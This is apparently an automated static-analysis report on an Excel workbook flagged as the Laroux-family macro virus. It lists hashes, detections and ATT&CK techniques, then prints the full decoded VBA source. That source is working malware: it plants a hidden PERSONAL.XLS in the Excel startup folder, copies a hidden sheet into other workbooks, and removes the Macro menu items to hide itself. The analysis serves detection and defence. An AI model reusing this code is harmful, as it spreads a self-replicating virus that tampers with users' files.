Xls.Trojan.Laroux-27 — Office (OLE) malware analysis

Static analysis result for SHA-256 91727a65c6b4a59f…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 32.0 KB
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: e21ad9bc84550a12dc00fdc0822841b3
SHA-1: 7184ba4ec695aa5e9c244263a543d3ec7919e222
SHA-256: 91727a65c6b4a59f83dda63b1ef570d2ec539157ef3c87b53893ed1dd19bc095
Risk Score: 180

Malware Insights

Xls.Trojan.Laroux-27 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The file is detected as Xls.Trojan.Laroux-27 by ClamAV. It contains a VBA macro with an Auto_Open subroutine that attempts to establish persistence by creating or modifying the PERSONAL.XLS file in the Excel startup path. This macro is designed to run automatically when Excel is opened.

Heuristics 3

  • ClamAV: Xls.Trojan.Laroux-27 · critical · CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Laroux-27
  • VBA macros detected · medium · 1 related finding · OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro · high · OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2271 bytes
SHA-256: 47b7375f9d1808813466da0870fa61c9638e24d3fdcafcac62c950f855af6320
Detection: ClamAV: Xls.Trojan.Laroux-27
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script)

Attribute VB_Name = "guyan"


Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "al_muskilat"
End Sub


Sub al_muskilat()
Attribute al_muskilat.VB_ProcData.VB_Invoke_Func = " \n14"
' *****************************************************************
' Name    : ExcelMacro.al_muskilat
' Origin  : England
' Created : January 01, 1997
' Author  : Pyro [VBB]
' *****************************************************************
On Error GoTo ErrorHandler
Application.ScreenUpdating = False
Application.DisplayAlerts = False
Installed = 0
If ThisWorkbook.Name <> "PERSONAL.XLS" Then
If Dir(Application.StartupPath + "\PERSONAL.XLS") = "PERSONAL.XLS" Then Installed = 1
If Installed = 1 Then
GoTo ErrorHandler
Else
Workbooks.Add.SaveAs FileName:=Application.StartupPath + "\PERSONAL.XLS"
Workbooks(ThisWorkbook.Name).Sheets("guyan").Copy Before:=Workbooks("PERSONAL.XLS").Sheets(1)
Workbooks("PERSONAL.XLS").Sheets("guyan").Visible = False
Workbooks("PERSONAL.XLS").Save
Windows("PERSONAL.XLS").Visible = False
End If
Else
Windows("PERSONAL.XLS").Visible = False
For I = 1 To Workbooks(ActiveWorkbook.Name).Sheets.Count
If Workbooks(ActiveWorkbook.Name).Sheets(I).Name = "guyan" Then Installed = 1
Next
If Installed = 1 Then
GoTo ErrorHandler
Else
Workbooks("PERSONAL.XLS").Sheets("guyan").Copy Before:=Workbooks(ActiveWorkbook.Name).Sheets(1)
Workbooks(ActiveWorkbook.Name).Sheets("guyan").Visible = False
Workbooks(ActiveWorkbook.Name).Save
Windows("PERSONAL.XLS").Visible = False
End If
End If
Workbooks("PERSONAL.XLS").Save
Application.ScreenUpdating = True
Application.DisplayAlerts = True
If Day(Now()) = Int((31 * Rnd) + 1) Then MsgBox "You've Been Infected By Guyan!", 16, "Ha....Ha....Ha... [VBB]"
MenuBars(xlWorksheet).Menus("Tools").MenuItems("&Macro...").Delete
MenuBars(xlModule).Menus("Tools").MenuItems("&Macro...").Delete
MenuBars(xlNoDocuments).Menus("Tools").MenuItems("&Macro...").Delete
MenuBars(xlInfo).Menus("Tools").MenuItems("&Macro...").Delete
MenuBars(xlChart).Menus("Tools").MenuItems("&Macro...").Delete
ErrorHandler:
On Error Resume Next
Err = 0
Workbooks(ActiveWorkbook.Name).Sheets("guyan").Visible = False
On Error GoTo 0
End Sub